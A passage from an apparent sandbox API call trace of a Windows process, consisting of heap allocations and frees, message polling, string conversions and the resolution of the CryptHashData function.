Size=0x10) returned 0x2e51d30 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0264.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0264.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0264.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.430] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0264.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0264.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0264.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.437] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0264.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.438] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 